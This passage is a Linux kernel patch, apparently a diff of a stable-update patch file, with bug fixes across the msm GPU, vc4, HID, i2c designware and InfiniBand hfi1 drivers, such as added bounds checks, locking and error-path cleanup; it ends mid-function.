+ #define GBIF_CLIENT_HALT_MASK             BIT(0)
+ #define GBIF_ARB_HALT_MASK                BIT(1)
+ 
+-static void a6xx_bus_clear_pending_transactions(struct adreno_gpu *adreno_gpu)
++static void a6xx_bus_clear_pending_transactions(struct adreno_gpu *adreno_gpu,
++		bool gx_off)
+ {
+ 	struct msm_gpu *gpu = &adreno_gpu->base;
+ 
+@@ -889,9 +890,11 @@ static void a6xx_bus_clear_pending_transactions(struct adreno_gpu *adreno_gpu)
+ 		return;
+ 	}
+ 
+-	/* Halt the gx side of GBIF */
+-	gpu_write(gpu, REG_A6XX_RBBM_GBIF_HALT, 1);
+-	spin_until(gpu_read(gpu, REG_A6XX_RBBM_GBIF_HALT_ACK) & 1);
++	if (gx_off) {
++		/* Halt the gx side of GBIF */
++		gpu_write(gpu, REG_A6XX_RBBM_GBIF_HALT, 1);
++		spin_until(gpu_read(gpu, REG_A6XX_RBBM_GBIF_HALT_ACK) & 1);
++	}
+ 
+ 	/* Halt new client requests on GBIF */
+ 	gpu_write(gpu, REG_A6XX_GBIF_HALT, GBIF_CLIENT_HALT_MASK);
+@@ -929,7 +932,7 @@ static void a6xx_gmu_force_off(struct a6xx_gmu *gmu)
+ 	/* Halt the gmu cm3 core */
+ 	gmu_write(gmu, REG_A6XX_GMU_CM3_SYSRESET, 1);
+ 
+-	a6xx_bus_clear_pending_transactions(adreno_gpu);
++	a6xx_bus_clear_pending_transactions(adreno_gpu, true);
+ 
+ 	/* Reset GPU core blocks */
+ 	gpu_write(gpu, REG_A6XX_RBBM_SW_RESET_CMD, 1);
+@@ -1083,7 +1086,7 @@ static void a6xx_gmu_shutdown(struct a6xx_gmu *gmu)
+ 			return;
+ 		}
+ 
+-		a6xx_bus_clear_pending_transactions(adreno_gpu);
++		a6xx_bus_clear_pending_transactions(adreno_gpu, a6xx_gpu->hung);
+ 
+ 		/* tell the GMU we want to slumber */
+ 		ret = a6xx_gmu_notify_slumber(gmu);
+diff --git a/drivers/gpu/drm/msm/adreno/a6xx_gpu.c b/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
+index e846e629c00d8..9d7fc44c1e2a9 100644
+--- a/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/a6xx_gpu.c
+@@ -1277,6 +1277,12 @@ static void a6xx_recover(struct msm_gpu *gpu)
+ 	if (hang_debug)
+ 		a6xx_dump(gpu);
+ 
++	/*
++	 * To handle recovery specific sequences during the rpm suspend we are
++	 * about to trigger
++	 */
++	a6xx_gpu->hung = true;
++
+ 	/* Halt SQE first */
+ 	gpu_write(gpu, REG_A6XX_CP_SQE_CNTL, 3);
+ 
+@@ -1319,6 +1325,7 @@ static void a6xx_recover(struct msm_gpu *gpu)
+ 	mutex_unlock(&gpu->active_lock);
+ 
+ 	msm_gpu_hw_init(gpu);
++	a6xx_gpu->hung = false;
+ }
+ 
+ static const char *a6xx_uche_fault_block(struct msm_gpu *gpu, u32 mid)
+diff --git a/drivers/gpu/drm/msm/adreno/a6xx_gpu.h b/drivers/gpu/drm/msm/adreno/a6xx_gpu.h
+index ab853f61db632..eea2e60ce3b7b 100644
+--- a/drivers/gpu/drm/msm/adreno/a6xx_gpu.h
++++ b/drivers/gpu/drm/msm/adreno/a6xx_gpu.h
+@@ -32,6 +32,7 @@ struct a6xx_gpu {
+ 	void *llc_slice;
+ 	void *htw_llc_slice;
+ 	bool have_mmu500;
++	bool hung;
+ };
+ 
+ #define to_a6xx_gpu(x) container_of(x, struct a6xx_gpu, base)
+diff --git a/drivers/gpu/drm/msm/adreno/adreno_gpu.c b/drivers/gpu/drm/msm/adreno/adreno_gpu.c
+index 5a0e8491cd3a0..2e7531d2a5d6e 100644
+--- a/drivers/gpu/drm/msm/adreno/adreno_gpu.c
++++ b/drivers/gpu/drm/msm/adreno/adreno_gpu.c
+@@ -351,6 +351,8 @@ int adreno_set_param(struct msm_gpu *gpu, struct msm_file_private *ctx,
+ 		/* Ensure string is null terminated: */
+ 		str[len] = '\0';
+ 
++		mutex_lock(&gpu->lock);
++
+ 		if (param == MSM_PARAM_COMM) {
+ 			paramp = &ctx->comm;
+ 		} else {
+@@ -360,6 +362,8 @@ int adreno_set_param(struct msm_gpu *gpu, struct msm_file_private *ctx,
+ 		kfree(*paramp);
+ 		*paramp = str;
+ 
++		mutex_unlock(&gpu->lock);
++
+ 		return 0;
+ 	}
+ 	case MSM_PARAM_SYSPROF:
+diff --git a/drivers/gpu/drm/msm/msm_gpu.c b/drivers/gpu/drm/msm/msm_gpu.c
+index 021f4e29b613b..4f495eecc34ba 100644
+--- a/drivers/gpu/drm/msm/msm_gpu.c
++++ b/drivers/gpu/drm/msm/msm_gpu.c
+@@ -335,6 +335,8 @@ static void get_comm_cmdline(struct msm_gem_submit *submit, char **comm, char **
+ 	struct msm_file_private *ctx = submit->queue->ctx;
+ 	struct task_struct *task;
+ 
++	WARN_ON(!mutex_is_locked(&submit->gpu->lock));
++
+ 	/* Note that kstrdup will return NULL if argument is NULL: */
+ 	*comm = kstrdup(ctx->comm, GFP_KERNEL);
+ 	*cmd  = kstrdup(ctx->cmdline, GFP_KERNEL);
+diff --git a/drivers/gpu/drm/msm/msm_gpu.h b/drivers/gpu/drm/msm/msm_gpu.h
+index 58a72e6b14008..a89bfdc3d7f90 100644
+--- a/drivers/gpu/drm/msm/msm_gpu.h
++++ b/drivers/gpu/drm/msm/msm_gpu.h
+@@ -366,10 +366,18 @@ struct msm_file_private {
+ 	 */
+ 	int sysprof;
+ 
+-	/** comm: Overridden task comm, see MSM_PARAM_COMM */
++	/**
++	 * comm: Overridden task comm, see MSM_PARAM_COMM
++	 *
++	 * Accessed under msm_gpu::lock
++	 */
+ 	char *comm;
+ 
+-	/** cmdline: Overridden task cmdline, see MSM_PARAM_CMDLINE */
++	/**
++	 * cmdline: Overridden task cmdline, see MSM_PARAM_CMDLINE
++	 *
++	 * Accessed under msm_gpu::lock
++	 */
+ 	char *cmdline;
+ 
+ 	/**
+diff --git a/drivers/gpu/drm/panfrost/Kconfig b/drivers/gpu/drm/panfrost/Kconfig
+index 079600328be18..e6403a9d66ade 100644
+--- a/drivers/gpu/drm/panfrost/Kconfig
++++ b/drivers/gpu/drm/panfrost/Kconfig
+@@ -3,7 +3,8 @@
+ config DRM_PANFROST
+ 	tristate "Panfrost (DRM support for ARM Mali Midgard/Bifrost GPUs)"
+ 	depends on DRM
+-	depends on ARM || ARM64 || (COMPILE_TEST && !GENERIC_ATOMIC64)
++	depends on ARM || ARM64 || COMPILE_TEST
++	depends on !GENERIC_ATOMIC64    # for IOMMU_IO_PGTABLE_LPAE
+ 	depends on MMU
+ 	select DRM_SCHED
+ 	select IOMMU_SUPPORT
+diff --git a/drivers/gpu/drm/vc4/vc4_bo.c b/drivers/gpu/drm/vc4/vc4_bo.c
+index 231add8b8e127..ce0ea446bd707 100644
+--- a/drivers/gpu/drm/vc4/vc4_bo.c
++++ b/drivers/gpu/drm/vc4/vc4_bo.c
+@@ -179,6 +179,7 @@ static void vc4_bo_destroy(struct vc4_bo *bo)
+ 		bo->validated_shader = NULL;
+ 	}
+ 
++	mutex_destroy(&bo->madv_lock);
+ 	drm_gem_dma_free(&bo->base);
+ }
+ 
+@@ -394,7 +395,6 @@ struct drm_gem_object *vc4_create_object(struct drm_device *dev, size_t size)
+ {
+ 	struct vc4_dev *vc4 = to_vc4_dev(dev);
+ 	struct vc4_bo *bo;
+-	int ret;
+ 
+ 	if (WARN_ON_ONCE(vc4->is_vc5))
+ 		return ERR_PTR(-ENODEV);
+@@ -406,9 +406,7 @@ struct drm_gem_object *vc4_create_object(struct drm_device *dev, size_t size)
+ 	bo->madv = VC4_MADV_WILLNEED;
+ 	refcount_set(&bo->usecnt, 0);
+ 
+-	ret = drmm_mutex_init(dev, &bo->madv_lock);
+-	if (ret)
+-		return ERR_PTR(ret);
++	mutex_init(&bo->madv_lock);
+ 
+ 	mutex_lock(&vc4->bo_lock);
+ 	bo->label = VC4_BO_TYPE_KERNEL;
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_msg_arm64.h b/drivers/gpu/drm/vmwgfx/vmwgfx_msg_arm64.h
+old mode 100755
+new mode 100644
+diff --git a/drivers/hid/amd-sfh-hid/amd_sfh_client.c b/drivers/hid/amd-sfh-hid/amd_sfh_client.c
+index ab125f79408f2..1fb0f7105fb21 100644
+--- a/drivers/hid/amd-sfh-hid/amd_sfh_client.c
++++ b/drivers/hid/amd-sfh-hid/amd_sfh_client.c
+@@ -282,7 +282,7 @@ int amd_sfh_hid_client_init(struct amd_mp2_dev *privdata)
+ 		}
+ 		rc = mp2_ops->get_rep_desc(cl_idx, cl_data->report_descr[i]);
+ 		if (rc)
+-			return rc;
++			goto cleanup;
+ 		mp2_ops->start(privdata, info);
+ 		status = amd_sfh_wait_for_response
+ 				(privdata, cl_data->sensor_idx[i], SENSOR_ENABLED);
+diff --git a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
+index 4da2f9f62aba3..a1d6e08fab7d4 100644
+--- a/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
++++ b/drivers/hid/amd-sfh-hid/sfh1_1/amd_sfh_init.c
+@@ -160,7 +160,7 @@ static int amd_sfh1_1_hid_client_init(struct amd_mp2_dev *privdata)
+ 		}
+ 		rc = mp2_ops->get_rep_desc(cl_idx, cl_data->report_descr[i]);
+ 		if (rc)
+-			return rc;
++			goto cleanup;
+ 
+ 		writel(0, privdata->mmio + AMD_P2C_MSG(0));
+ 		mp2_ops->start(privdata, info);
+diff --git a/drivers/hid/hid-betopff.c b/drivers/hid/hid-betopff.c
+index 467d789f9bc2d..25ed7b9a917e4 100644
+--- a/drivers/hid/hid-betopff.c
++++ b/drivers/hid/hid-betopff.c
+@@ -60,7 +60,6 @@ static int betopff_init(struct hid_device *hid)
+ 	struct list_head *report_list =
+ 			&hid->report_enum[HID_OUTPUT_REPORT].report_list;
+ 	struct input_dev *dev;
+-	int field_count = 0;
+ 	int error;
+ 	int i, j;
+ 
+@@ -86,19 +85,21 @@ static int betopff_init(struct hid_device *hid)
+ 	 * -----------------------------------------
+ 	 * Do init them with default value.
+ 	 */
++	if (report->maxfield < 4) {
++		hid_err(hid, "not enough fields in the report: %d\n",
++				report->maxfield);
++		return -ENODEV;
++	}
+ 	for (i = 0; i < report->maxfield; i++) {
++		if (report->field[i]->report_count < 1) {
++			hid_err(hid, "no values in the field\n");
++			return -ENODEV;
++		}
+ 		for (j = 0; j < report->field[i]->report_count; j++) {
+ 			report->field[i]->value[j] = 0x00;
+-			field_count++;
+ 		}
+ 	}
+ 
+-	if (field_count < 4) {
+-		hid_err(hid, "not enough fields in the report: %d\n",
+-				field_count);
+-		return -ENODEV;
+-	}
+-
+ 	betopff = kzalloc(sizeof(*betopff), GFP_KERNEL);
+ 	if (!betopff)
+ 		return -ENOMEM;
+diff --git a/drivers/hid/hid-bigbenff.c b/drivers/hid/hid-bigbenff.c
+index e8c5e3ac9fff1..e8b16665860d6 100644
+--- a/drivers/hid/hid-bigbenff.c
++++ b/drivers/hid/hid-bigbenff.c
+@@ -344,6 +344,11 @@ static int bigben_probe(struct hid_device *hid,
+ 	}
+ 
+ 	report_list = &hid->report_enum[HID_OUTPUT_REPORT].report_list;
++	if (list_empty(report_list)) {
++		hid_err(hid, "no output report found\n");
++		error = -ENODEV;
++		goto error_hw_stop;
++	}
+ 	bigben->report = list_entry(report_list->next,
+ 		struct hid_report, list);
+ 
+diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
+index bd47628da6be0..3e1803592bd4a 100644
+--- a/drivers/hid/hid-core.c
++++ b/drivers/hid/hid-core.c
+@@ -993,8 +993,8 @@ struct hid_report *hid_validate_values(struct hid_device *hid,
+ 		 * Validating on id 0 means we should examine the first
+ 		 * report in the list.
+ 		 */
+-		report = list_entry(
+-				hid->report_enum[type].report_list.next,
++		report = list_first_entry_or_null(
++				&hid->report_enum[type].report_list,
+ 				struct hid_report, list);
+ 	} else {
+ 		report = hid->report_enum[type].report_id_hash[id];
+diff --git a/drivers/hid/hid-ids.h b/drivers/hid/hid-ids.h
+index 82713ef3aaa64..c3735848ed5db 100644
+--- a/drivers/hid/hid-ids.h
++++ b/drivers/hid/hid-ids.h
+@@ -274,7 +274,6 @@
+ #define USB_DEVICE_ID_CH_AXIS_295	0x001c
+ 
+ #define USB_VENDOR_ID_CHERRY		0x046a
+-#define USB_DEVICE_ID_CHERRY_MOUSE_000C	0x000c
+ #define USB_DEVICE_ID_CHERRY_CYMOTION	0x0023
+ #define USB_DEVICE_ID_CHERRY_CYMOTION_SOLAR	0x0027
+ 
+diff --git a/drivers/hid/hid-quirks.c b/drivers/hid/hid-quirks.c
+index 0e9702c7f7d6c..be3ad02573de8 100644
+--- a/drivers/hid/hid-quirks.c
++++ b/drivers/hid/hid-quirks.c
+@@ -54,7 +54,6 @@ static const struct hid_device_id hid_quirks[] = {
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_CH, USB_DEVICE_ID_CH_FLIGHT_SIM_YOKE), HID_QUIRK_NOGET },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_CH, USB_DEVICE_ID_CH_PRO_PEDALS), HID_QUIRK_NOGET },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_CH, USB_DEVICE_ID_CH_PRO_THROTTLE), HID_QUIRK_NOGET },
+-	{ HID_USB_DEVICE(USB_VENDOR_ID_CHERRY, USB_DEVICE_ID_CHERRY_MOUSE_000C), HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_CORSAIR, USB_DEVICE_ID_CORSAIR_K65RGB), HID_QUIRK_NO_INIT_REPORTS },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_CORSAIR, USB_DEVICE_ID_CORSAIR_K65RGB_RAPIDFIRE), HID_QUIRK_NO_INIT_REPORTS | HID_QUIRK_ALWAYS_POLL },
+ 	{ HID_USB_DEVICE(USB_VENDOR_ID_CORSAIR, USB_DEVICE_ID_CORSAIR_K70RGB), HID_QUIRK_NO_INIT_REPORTS },
+diff --git a/drivers/hid/intel-ish-hid/ishtp/dma-if.c b/drivers/hid/intel-ish-hid/ishtp/dma-if.c
+index 40554c8daca07..00046cbfd4ed0 100644
+--- a/drivers/hid/intel-ish-hid/ishtp/dma-if.c
++++ b/drivers/hid/intel-ish-hid/ishtp/dma-if.c
+@@ -104,6 +104,11 @@ void *ishtp_cl_get_dma_send_buf(struct ishtp_device *dev,
+ 	int required_slots = (size / DMA_SLOT_SIZE)
+ 		+ 1 * (size % DMA_SLOT_SIZE != 0);
+ 
++	if (!dev->ishtp_dma_tx_map) {
++		dev_err(dev->devc, "Fail to allocate Tx map\n");
++		return NULL;
++	}
++
+ 	spin_lock_irqsave(&dev->ishtp_dma_tx_lock, flags);
+ 	for (i = 0; i <= (dev->ishtp_dma_num_slots - required_slots); i++) {
+ 		free = 1;
+@@ -150,6 +155,11 @@ void ishtp_cl_release_dma_acked_mem(struct ishtp_device *dev,
+ 		return;
+ 	}
+ 
++	if (!dev->ishtp_dma_tx_map) {
++		dev_err(dev->devc, "Fail to allocate Tx map\n");
++		return;
++	}
++
+ 	i = (msg_addr - dev->ishtp_host_dma_tx_buf) / DMA_SLOT_SIZE;
+ 	spin_lock_irqsave(&dev->ishtp_dma_tx_lock, flags);
+ 	for (j = 0; j < acked_slots; j++) {
+diff --git a/drivers/i2c/busses/i2c-designware-common.c b/drivers/i2c/busses/i2c-designware-common.c
+index c023b691441ea..bceaf70f4e237 100644
+--- a/drivers/i2c/busses/i2c-designware-common.c
++++ b/drivers/i2c/busses/i2c-designware-common.c
+@@ -351,7 +351,8 @@ u32 i2c_dw_scl_hcnt(u32 ic_clk, u32 tSYMBOL, u32 tf, int cond, int offset)
+ 		 *
+ 		 * If your hardware is free from tHD;STA issue, try this one.
+ 		 */
+-		return DIV_ROUND_CLOSEST(ic_clk * tSYMBOL, MICRO) - 8 + offset;
++		return DIV_ROUND_CLOSEST_ULL((u64)ic_clk * tSYMBOL, MICRO) -
++		       8 + offset;
+ 	else
+ 		/*
+ 		 * Conditional expression:
+@@ -367,7 +368,8 @@ u32 i2c_dw_scl_hcnt(u32 ic_clk, u32 tSYMBOL, u32 tf, int cond, int offset)
+ 		 * The reason why we need to take into account "tf" here,
+ 		 * is the same as described in i2c_dw_scl_lcnt().
+ 		 */
+-		return DIV_ROUND_CLOSEST(ic_clk * (tSYMBOL + tf), MICRO) - 3 + offset;
++		return DIV_ROUND_CLOSEST_ULL((u64)ic_clk * (tSYMBOL + tf), MICRO) -
++		       3 + offset;
+ }
+ 
+ u32 i2c_dw_scl_lcnt(u32 ic_clk, u32 tLOW, u32 tf, int offset)
+@@ -383,7 +385,8 @@ u32 i2c_dw_scl_lcnt(u32 ic_clk, u32 tLOW, u32 tf, int offset)
+ 	 * account the fall time of SCL signal (tf).  Default tf value
+ 	 * should be 0.3 us, for safety.
+ 	 */
+-	return DIV_ROUND_CLOSEST(ic_clk * (tLOW + tf), MICRO) - 1 + offset;
++	return DIV_ROUND_CLOSEST_ULL((u64)ic_clk * (tLOW + tf), MICRO) -
++	       1 + offset;
+ }
+ 
+ int i2c_dw_set_sda_hold(struct dw_i2c_dev *dev)
+diff --git a/drivers/i2c/busses/i2c-designware-platdrv.c b/drivers/i2c/busses/i2c-designware-platdrv.c
+index ba043b5473936..74182db03a88b 100644
+--- a/drivers/i2c/busses/i2c-designware-platdrv.c
++++ b/drivers/i2c/busses/i2c-designware-platdrv.c
+@@ -351,13 +351,11 @@ static int dw_i2c_plat_probe(struct platform_device *pdev)
+ 
+ 	if (dev->flags & ACCESS_NO_IRQ_SUSPEND) {
+ 		dev_pm_set_driver_flags(&pdev->dev,
+-					DPM_FLAG_SMART_PREPARE |
+-					DPM_FLAG_MAY_SKIP_RESUME);
++					DPM_FLAG_SMART_PREPARE);
+ 	} else {
+ 		dev_pm_set_driver_flags(&pdev->dev,
+ 					DPM_FLAG_SMART_PREPARE |
+-					DPM_FLAG_SMART_SUSPEND |
+-					DPM_FLAG_MAY_SKIP_RESUME);
++					DPM_FLAG_SMART_SUSPEND);
+ 	}
+ 
+ 	device_enable_async_suspend(&pdev->dev);
+@@ -419,21 +417,8 @@ static int dw_i2c_plat_prepare(struct device *dev)
+ 	 */
+ 	return !has_acpi_companion(dev);
+ }
+-
+-static void dw_i2c_plat_complete(struct device *dev)
+-{
+-	/*
+-	 * The device can only be in runtime suspend at this point if it has not
+-	 * been resumed throughout the ending system suspend/resume cycle, so if
+-	 * the platform firmware might mess up with it, request the runtime PM
+-	 * framework to resume it.
+-	 */
+-	if (pm_runtime_suspended(dev) && pm_resume_via_firmware())
+-		pm_request_resume(dev);
+-}
+ #else
+ #define dw_i2c_plat_prepare	NULL
+-#define dw_i2c_plat_complete	NULL
+ #endif
+ 
+ #ifdef CONFIG_PM
+@@ -483,7 +468,6 @@ static int __maybe_unused dw_i2c_plat_resume(struct device *dev)
+ 
+ static const struct dev_pm_ops dw_i2c_dev_pm_ops = {
+ 	.prepare = dw_i2c_plat_prepare,
+-	.complete = dw_i2c_plat_complete,
+ 	SET_LATE_SYSTEM_SLEEP_PM_OPS(dw_i2c_plat_suspend, dw_i2c_plat_resume)
+ 	SET_RUNTIME_PM_OPS(dw_i2c_plat_runtime_suspend, dw_i2c_plat_runtime_resume, NULL)
+ };
+diff --git a/drivers/infiniband/core/verbs.c b/drivers/infiniband/core/verbs.c
+index 26b021f43ba40..11b1c1603aeb4 100644
+--- a/drivers/infiniband/core/verbs.c
++++ b/drivers/infiniband/core/verbs.c
+@@ -2957,15 +2957,18 @@ EXPORT_SYMBOL(__rdma_block_iter_start);
+ bool __rdma_block_iter_next(struct ib_block_iter *biter)
+ {
+ 	unsigned int block_offset;
++	unsigned int sg_delta;
+ 
+ 	if (!biter->__sg_nents || !biter->__sg)
+ 		return false;
+ 
+ 	biter->__dma_addr = sg_dma_address(biter->__sg) + biter->__sg_advance;
+ 	block_offset = biter->__dma_addr & (BIT_ULL(biter->__pg_bit) - 1);
+-	biter->__sg_advance += BIT_ULL(biter->__pg_bit) - block_offset;
++	sg_delta = BIT_ULL(biter->__pg_bit) - block_offset;
+ 
+-	if (biter->__sg_advance >= sg_dma_len(biter->__sg)) {
++	if (sg_dma_len(biter->__sg) - biter->__sg_advance > sg_delta) {
++		biter->__sg_advance += sg_delta;
++	} else {
+ 		biter->__sg_advance = 0;
+ 		biter->__sg = sg_next(biter->__sg);
+ 		biter->__sg_nents--;
+diff --git a/drivers/infiniband/hw/hfi1/user_exp_rcv.c b/drivers/infiniband/hw/hfi1/user_exp_rcv.c
+index 186d302912606..b02f2f0809c81 100644
+--- a/drivers/infiniband/hw/hfi1/user_exp_rcv.c
++++ b/drivers/infiniband/hw/hfi1/user_exp_rcv.c
+@@ -23,18 +23,25 @@ static void cacheless_tid_rb_remove(struct hfi1_filedata *fdata,
+ static bool tid_rb_invalidate(struct mmu_interval_notifier *mni,
+ 			      const struct mmu_notifier_range *range,
+ 			      unsigned long cur_seq);
++static bool tid_cover_invalidate(struct mmu_interval_notifier *mni,
++			         const struct mmu_notifier_range *range,
++			         unsigned long cur_seq);
+ static int program_rcvarray(struct hfi1_filedata *fd, struct tid_user_buf *,
+ 			    struct tid_group *grp,
+ 			    unsigned int start, u16 count,
+ 			    u32 *tidlist, unsigned int *tididx,
+ 			    unsigned int *pmapped);
+-static int unprogram_rcvarray(struct hfi1_filedata *fd, u32 tidinfo,
+-			      struct tid_group **grp);
++static int unprogram_rcvarray(struct hfi1_filedata *fd, u32 tidinfo);
++static void __clear_tid_node(struct hfi1_filedata *fd,
++			     struct tid_rb_node *node);
+ static void clear_tid_node(struct hfi1_filedata *fd, struct tid_rb_node *node);
+ 
+ static const struct mmu_interval_notifier_ops tid_mn_ops = {
+ 	.invalidate = tid_rb_invalidate,
+ };
++static const struct mmu_interval_notifier_ops tid_cover_ops = {
++	.invalidate = tid_cover_invalidate,
++};
+ 
+ /*
+  * Initialize context and file private data needed for Expected
+@@ -253,53 +260,65 @@ int hfi1_user_exp_rcv_setup(struct hfi1_filedata *fd,
+ 		tididx = 0, mapped, mapped_pages = 0;
+ 	u32 *tidlist = NULL;
+ 	struct tid_user_buf *tidbuf;
++	unsigned long mmu_seq = 0;
+ 
+ 	if (!PAGE_ALIGNED(tinfo->vaddr))
+ 		return -EINVAL;
++	if (tinfo->length == 0)
++		return -EINVAL;
+ 
+ 	tidbuf = kzalloc(sizeof(*tidbuf), GFP_KERNEL);
+ 	if (!tidbuf)
+ 		return -ENOMEM;
+ 
++	mutex_init(&tidbuf->cover_mutex);
+ 	tidbuf->vaddr = tinfo->vaddr;
+ 	tidbuf->length = tinfo->length;
+ 	tidbuf->psets = kcalloc(uctxt->expected_count, sizeof(*tidbuf->psets),
+ 				GFP_KERNEL);
+ 	if (!tidbuf->psets) {
+-		kfree(tidbuf);
+-		return -ENOMEM;
++		ret = -ENOMEM;
++		goto fail_release_mem;
++	}
++
++	if (fd->use_mn) {
++		ret = mmu_interval_notifier_insert(
++			&tidbuf->notifier, current->mm,
++			tidbuf->vaddr, tidbuf->npages * PAGE_SIZE,
++			&tid_cover_ops);
++		if (ret)
++			goto fail_release_mem;
++		mmu_seq = mmu_interval_read_begin(&tidbuf->notifier);
+ 	}
+ 
+ 	pinned = pin_rcv_pages(fd, tidbuf);
+ 	if (pinned <= 0) {
+-		kfree(tidbuf->psets);
+-		kfree(tidbuf);
+-		return pinned;
++		ret = (pinned < 0) ? pinned : -ENOSPC;
++		goto fail_unpin;
+ 	}
+ 
+ 	/* Find sets of physically contiguous pages */
+ 	tidbuf->n_psets = find_phys_blocks(tidbuf, pinned);
+ 
+-	/*
+-	 * We don't need to access this under a lock since tid_used is per
+-	 * process and the same process cannot be in hfi1_user_exp_rcv_clear()
+-	 * and hfi1_user_exp_rcv_setup() at the same time.
+-	 */
++	/* Reserve the number of expected tids to be used. */
+ 	spin_lock(&fd->tid_lock);
+ 	if (fd->tid_used + tidbuf->n_psets > fd->tid_limit)
+ 		pageset_count = fd->tid_limit - fd->tid_used;
+ 	else
+ 		pageset_count = tidbuf->n_psets;
++	fd->tid_used += pageset_count;
+ 	spin_unlock(&fd->tid_lock);
+ 
+-	if (!pageset_count)
+-		goto bail;
++	if (!pageset_count) {
++		ret = -ENOSPC;
++		goto fail_unreserve;
++	}
+ 
+ 	ngroups = pageset_count / dd->rcv_entries.group_size;
+ 	tidlist = kcalloc(pageset_count, sizeof(*tidlist), GFP_KERNEL);
+ 	if (!tidlist) {
+ 		ret = -ENOMEM;
+-		goto nomem;
++		goto fail_unreserve;
+ 	}
+ 
+ 	tididx = 0;
+@@ -395,43 +414,78 @@ int hfi1_user_exp_rcv_setup(struct hfi1_filedata *fd,
+ 	}
+ unlock:
+ 	mutex_unlock(&uctxt->exp_mutex);
+-nomem:
+ 	hfi1_cdbg(TID, "total mapped: tidpairs:%u pages:%u (%d)", tididx,
+ 		  mapped_pages, ret);
+-	if (tididx) {
+-		spin_lock(&fd->tid_lock);
+-		fd->tid_used += tididx;
+-		spin_unlock(&fd->tid_lock);
+-		tinfo->tidcnt = tididx;
+-		tinfo->length = mapped_pages * PAGE_SIZE;
+-
+-		if (copy_to_user(u64_to_user_ptr(tinfo->tidlist),
+-				 tidlist, sizeof(tidlist[0]) * tididx)) {
+-			/*
+-			 * On failure to copy to the user level, we need to undo
+-			 * everything done so far so we don't leak resources.
+-			 */
+-			tinfo->tidlist = (unsigned long)&tidlist;
+-			hfi1_user_exp_rcv_clear(fd, tinfo);
+-			tinfo->tidlist = 0;
+-			ret = -EFAULT;
+-			goto bail;
++
++	/* fail if nothing was programmed, set error if none provided */
++	if (tididx == 0) {
++		if (ret >= 0)
++			ret = -ENOSPC;
++		goto fail_unreserve;
++	}
++
++	/* adjust reserved tid_used to actual count */
++	spin_lock(&fd->tid_lock);
++	fd->tid_used -= pageset_count - tididx;
++	spin_unlock(&fd->tid_lock);
++
++	/* unpin all pages not covered by a TID */
++	unpin_rcv_pages(fd, tidbuf, NULL, mapped_pages, pinned - mapped_pages,
++			false);
++
++	if (fd->use_mn) {
++		/* check for an invalidate during setup */
++		bool fail = false;
++
++		mutex_lock(&tidbuf->cover_mutex);
++		fail = mmu_interval_read_retry(&tidbuf->notifier, mmu_seq);
++		mutex_unlock(&tidbuf->cover_mutex);
++
++		if (fail) {
++			ret = -EBUSY;
++			goto fail_unprogram;
+ 		}
+ 	}
+ 
+-	/*
+-	 * If not everything was mapped (due to insufficient RcvArray entries,
+-	 * for example), unpin all unmapped pages so we can pin them nex time.
+-	 */
+-	if (mapped_pages != pinned)
+-		unpin_rcv_pages(fd, tidbuf, NULL, mapped_pages,
+-				(pinned - mapped_pages), false);
+-bail:
++	tinfo->tidcnt = tididx;
++	tinfo->length = mapped_pages * PAGE_SIZE;
++
++	if (copy_to_user(u64_to_user_ptr(tinfo->tidlist),
++			 tidlist, sizeof(tidlist[0]) * tididx)) {
++		ret = -EFAULT;
++		goto fail_unprogram;
++	}
++
++	if (fd->use_mn)
++		mmu_interval_notifier_remove(&tidbuf->notifier);
++	kfree(tidbuf->pages);
+ 	kfree(tidbuf->psets);
++	kfree(tidbuf);
+ 	kfree(tidlist);
++	return 0;
++
++fail_unprogram:
++	/* unprogram, unmap, and unpin all allocated TIDs */
++	tinfo->tidlist = (unsigned long)tidlist;
++	hfi1_user_exp_rcv_clear(fd, tinfo);
++	tinfo->tidlist = 0;
++	pinned = 0;		/* nothing left to unpin */
++	pageset_count = 0;	/* nothing left reserved */
++fail_unreserve:
++	spin_lock(&fd->tid_lock);
++	fd->tid_used -= pageset_count;
++	spin_unlock(&fd->tid_lock);
++fail_unpin:
++	if (fd->use_mn)
++		mmu_interval_notifier_remove(&tidbuf->notifier);
++	if (pinned > 0)
++		unpin_rcv_pages(fd, tidbuf, NULL, 0, pinned, false);
++fail_release_mem:
+ 	kfree(tidbuf->pages);
++	kfree(tidbuf->psets);
+ 	kfree(tidbuf);
+-	return ret > 0 ? 0 : ret;
++	kfree(tidlist);
++	return ret;
+ }
+ 
+ int hfi1_user_exp_rcv_clear(struct hfi1_filedata *fd,
+@@ -452,7 +506,7 @@ int hfi1_user_exp_rcv_clear(struct hfi1_filedata *fd,
+ 
+ 	mutex_lock(&uctxt->exp_mutex);
+ 	for (tididx = 0; tididx < tinfo->tidcnt; tididx++) {
+-		ret = unprogram_rcvarray(fd, tidinfo[tididx], NULL);
++		ret = unprogram_rcvarray(fd, tidinfo[tididx]);
+ 		if (ret) {
+ 			hfi1_cdbg(TID, "Failed to unprogram rcv array %d",
+ 				  ret);
+@@ -706,6 +760,7 @@ static int set_rcvarray_entry(struct hfi1_filedata *fd,
+ 	}
+ 
+ 	node->fdata = fd;
++	mutex_init(&node->invalidate_mutex);
+ 	node->phys = page_to_phys(pages[0]);
+ 	node->npages = npages;
+ 	node->rcventry = rcventry;
+@@ -721,11 +776,6 @@ static int set_rcvarray_entry(struct hfi1_filedata *fd,
+ 			&tid_mn_ops);
+ 		if (ret)
+ 			goto out_unmap;
+-		/*
+-		 * FIXME: This is in the wrong order, the notifier should be
+-		 * established before the pages are pinned by pin_rcv_pages.
+-		 */
+-		mmu_interval_read_begin(&node->notifier);
+ 	}
+ 	fd->entry_to_rb[node->rcventry - uctxt->expected_base] = node;
+ 
+@@ -745,8 +795,7 @@ out_unmap:
+ 	return -EFAULT;
+ }
+ 
+-static int unprogram_rcvarray(struct hfi1_filedata *fd, u32 tidinfo,
+-			      struct tid_group **grp)
